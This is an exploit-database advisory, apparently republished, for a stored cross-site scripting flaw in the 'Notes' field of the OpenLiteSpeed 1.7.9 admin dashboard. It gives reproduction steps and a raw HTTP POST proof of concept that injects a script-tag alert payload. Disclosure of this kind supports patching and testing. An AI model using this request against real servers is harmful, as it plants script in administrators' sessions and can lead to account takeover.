Openlitespeed 1.7.9 Exploit, 'Notes' Stored Cross-Site Scripting

# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
# Date: 3/30/2021
# Exploit Author: cmOs
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.9
# Tested on Ubuntu 20.04

Step 1: Log in to the dashboard using the Administrator account
Step 2: Go to Listeners > Summary > Actions (View) > Edit
Step 3: Inject XSS_Payload to "Notes" parameter
Step 4: Graceful Restart
Step 5: Trigger XSS when Administrator click on Default Icon

[POC]

POST /view/confMgr.php HTTP/1.1
Host: 127.0.0.1:7080
Connection: close
Content-Length: 163
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D

name=Default&ip=ANY&port=8088&reusePort=&secure=0¬e=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD